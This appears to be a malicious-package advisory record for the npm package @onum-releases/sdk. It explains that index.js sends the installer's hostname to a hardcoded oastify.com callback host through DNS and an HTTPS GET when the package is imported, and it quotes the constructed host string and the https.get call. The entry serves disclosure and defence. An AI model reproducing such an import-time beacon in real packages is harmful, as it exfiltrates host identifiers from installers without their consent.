MAL-2026-6125

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cae207a349e4bda9359f4981d60ec81d9492cd8624535ee01b44c8f3bf3b3208) On import, index.js reads the installer's machine hostname via os.hostname(), embeds it as a subdomain of a hardcoded *.oastify.com (Burp Collaborator out-of-band callback) host, and issues an HTTPS GET to that host. Specifically, index.js lines 5-7 build `sdk.<hostname>.200majoeu01dk02xnjdajro1isojc90y.oastify.com` and call `https.get({ host: host, path: '/sdk',... })`. The fetch fires unconditionally on `require('@onum-releases/sdk')` with no caller consent, leaking the installer's hostname (via both DNS and HTTPS) to whoever controls that Collaborator instance. The package's own description says 'Security PoC placeholder - benign, no runtime payload', but the shipped code does run an import-time beacon. The `@onum-releases` scope plus PoC framing is consistent with a dependency-confusion probe against an internal `onum` namespace; the harm to any installer who pulls it (intentionally or via name confusion) is host-identifier exfiltration to a third-party OAST server.